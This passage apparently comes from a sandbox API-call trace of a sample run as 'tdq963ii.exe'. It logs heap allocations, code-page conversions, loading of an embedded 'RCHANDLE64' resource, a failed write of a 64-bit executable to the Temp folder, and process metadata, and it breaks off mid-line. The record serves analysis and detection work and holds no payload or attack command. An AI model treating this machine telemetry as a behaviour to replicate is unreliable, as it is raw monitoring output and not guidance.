[0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3a) returned 0x304e00 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x90) returned 0x308248 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x3082e0 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x30) returned 0x308310 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x36) returned 0x308348 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x308388 [0211.696] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x52) returned 0x3083d8 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3c) returned 0x304e48 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x308438 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x82) returned 0x308458 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x3084e8 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x306ad0 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2c) returned 0x308520 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x54) returned 0x308558 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x52) returned 0x3085b8 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x308618 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3c) returned 0x304e90 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x54) returned 0x308650 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x3086b0 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x30) returned 0x3086e0 [0211.697] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x8c) returned 0x308718 [0211.697] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308800 | out: hHeap=0x2f0000) returned 1 [0211.716] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x3087b0 [0211.716] GetLastError () returned 0x0 [0211.717] SetLastError (dwErrCode=0x0) [0211.717] GetLastError () returned 0x0 [0211.717] SetLastError (dwErrCode=0x0) [0211.717] GetLastError () returned 0x0 [0211.718] SetLastError (dwErrCode=0x0) [0211.718] GetACP () returned 0x4e4 [0211.718] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x220) returned 0x308fb8 [0211.718] GetLastError () returned 0x0 [0211.718] SetLastError (dwErrCode=0x0) [0211.718] IsValidCodePage (CodePage=0x4e4) returned 1 [0211.718] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0211.718] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0211.720] GetLastError () returned 0x0 [0211.721] SetLastError (dwErrCode=0x0) [0211.721] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0212.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0212.124] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0212.124] GetLastError () returned 0x0 [0212.124] SetLastError (dwErrCode=0x0) [0212.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0212.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0212.124] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0212.124] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0212.124] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ`Â\x91…äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0212.124] GetLastError () returned 0x0 [0212.124] SetLastError (dwErrCode=0x0) [0212.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0212.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0212.125] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0212.125] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0212.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ`Â\x91…äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0212.126] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x80) returned 0x3091e0 [0212.126] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0212.127] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0212.127] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3091e0) returned 0x80 [0212.127] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0212.128] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0212.128] GetCurrentProcess () returned 0xffffffff [0212.128] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0212.128] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0212.128] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0212.131] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0212.131] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0212.131] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0212.131] LockResource (hResData=0x43c648) returned 0x43c648 [0212.131] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x18) returned 0x3096b0 [0212.133] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0212.847] GetLastError () returned 0x20 [0212.847] GetLastError () returned 0x20 [0212.850] SetLastError (dwErrCode=0x20) [0212.850] GetLastError () returned 0x20 [0212.850] SetLastError (dwErrCode=0x20) [0212.850] GetLastError () returned 0x20 [0212.850] SetLastError (dwErrCode=0x20) [0212.851] GetLastError () returned 0x20 [0212.852] SetLastError (dwErrCode=0x20) [0212.852] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x1000) returned 0x3096d0 [0212.853] GetLastError () returned 0x20 [0212.853] SetLastError (dwErrCode=0x20) [0212.853] GetLastError () returned 0x20 [0212.853] SetLastError (dwErrCode=0x20) [0212.853] GetLastError () returned 0x20 [0212.853] SetLastError (dwErrCode=0x20) [0212.853] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0212.854] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0214.670] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3087b0 | out: hHeap=0x2f0000) returned 1 [0214.671] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0214.671] ExitProcess (uExitCode=0x1) [0214.671] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x307088 | out: hHeap=0x2f0000) returned 1 Process: id = "208" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x1dbde000" os_pid = "0xa28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x1c4" cmd_line = "tdq963ii.exe -accepteula -c 150 -y -p 2880 -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 772 os_tid = 0x344 [0208.642] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0208.642] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0208.642] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0208.643] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0208.643] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0208.643] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0208.643] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0208.643] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0208.643] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0208.643] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0208.643] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0208.643] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0208.644] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0208.644] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0208.644] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0208.644] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0208.644] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0208.644] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0208.644] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0208.644] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0208.645] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0208.646] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0208.646] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0208.646] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0208.646] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0208.646] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0208.646] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0208.646] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0208.646] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0208.647] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0208.647] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0208.647] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0208.647] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0208.647] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0208.647] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0208.647] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0208.647] GetProcAddress 